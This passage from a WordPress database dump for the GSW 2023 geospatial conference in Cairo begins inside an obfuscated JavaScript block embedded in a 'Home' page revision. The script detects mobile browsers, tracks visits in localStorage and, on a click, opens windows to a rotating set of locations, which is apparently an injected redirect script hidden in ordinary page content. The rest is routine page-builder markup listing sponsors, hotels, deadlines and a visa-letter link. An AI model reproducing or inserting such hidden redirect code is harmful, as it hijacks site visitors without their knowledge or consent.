)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','3063-autosave-v1','','','2023-06-23 20:34:55','2023-06-23 20:34:55','',3063,'https://gsw2023.com/?p=4749',0,'revision','',0),
(4750,4,'2023-06-23 20:42:46','2023-06-23 20:42:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687552961900{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #FFA500;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" 